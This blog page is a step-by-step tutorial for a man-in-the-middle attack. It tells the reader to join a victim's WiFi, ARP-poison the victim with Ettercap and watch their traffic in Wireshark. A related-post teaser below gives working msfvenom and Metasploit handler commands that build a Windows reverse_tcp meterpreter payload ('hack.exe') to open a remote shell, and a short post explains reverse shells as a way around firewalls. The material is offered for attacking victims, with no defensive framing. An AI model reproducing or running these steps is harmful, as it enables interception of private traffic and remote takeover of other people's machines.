Packet Sniffing Attack (MITM Attack)

  •   What is Packet Sniffing?

--> Packet sniffing is the practice of gathering, collecting, and logging some or all packets that pass through a computer network, regardless of how the packet is addressed. In this way, every packet, or a defined subset of packets, may be gathered for further analysis. You as a network administrator can use the collected data for a wide variety of purposes like monitoring bandwidth and traffic

  •   How This Works?

--> A packet sniffer, sometimes called a packet analyzer, is composed of two main parts. First, a network adapter that connects the sniffer to the existing network. Second, software that provides a way to log, see or analyze the data collected by the device.


Step1:-

  • Using your system connect into victims network(WIFI Network)
Step2:-
  • open new root terminal in Kali Linux 
Step3:-
  • Start Ettercap(GUI)
  • Write 'ettercap -g'

Step4:-
  • It will open Ettercap GUI 
  • Click on ✔

Step5:-

  • Click on scan for host

Step6:-
  • After completing scan it show scanned host in host list










Step7:-

  • Click on host list


Step8:-

  • Select victim system as Targate1 


Step9:-

  • To show our targate click on current targate


Step10:-

  • For start sniffing click on ARP Poissoning

  • Then after click on ok
Step11:-

  • Open new terminal and write wireshark
  • 'wireshark'


Step12:-

  • It will show you network traffic pass by you in wave form


Step13:-

  • Click on the blue fin
  • It will show you in brief  like which protocol is used etc.


Step14:-

  • Now we will open youtube on victims machin



Step15:-

  • Now type in wireshark filter contains youtube or what you find












Comments

Post a Comment

Popular posts from this blog

Exploiting Windows 10 using payload and reverse_tcp(Metasploit)

Image
         Step 1:- To get your IP address type the following command: ifconfig             Step 2:- Open terminal or Root terminal and type the following command :        msfvenom -p windows/x64/meterpreter/reverse_tcp lport=8080 lhost=<Enter your IP> -f exe > hack.exe you can use any lport like lport=4444,lport=8000          Step 3:- Find the file to the main desktop using drag and drop            Step 4:- In the terminal type the following command :   msfconsole   use exploit/multi/handler   set payload windows/x64/meterpreter/reverse_tcp   set lhost 192.168.43.110   set lport 8080   exploit          Step 5:-  Run the file which we put on the main desktop then after you will see the new meterpreter session   open         Step 5:- Type help...
Read more

What is TCP

The full form of TCP is Transmission Control Protocol  It stands for communications standard that enables application Programs  It also computing devices to exchange messages over a network  It is designed to send  packets across the internet  and ensure the successful delivery of data and messages over the network  It's  a basically Three-way handshake                What is TCP used for? TCP is used for organizing data in a way that ensures the secure transmission between the server and client                Example of TCP World Wide Web ( HTTP)   E-mail (SMTP TCP) File Transfer Protocol (FTP)           That's it from my side. Thank you 😊. Comments are appreciated
Read more

What is reverse_tcp

Reverse_tcp is basically  instead of the attacker initiating the connection which will obviously be blocked by the firewall Instade,the device initiates the connection to the attacker, which will be allowed by the firewall and the attacker then take control of the device and pass commands. It's  a type of reverse shell
Read more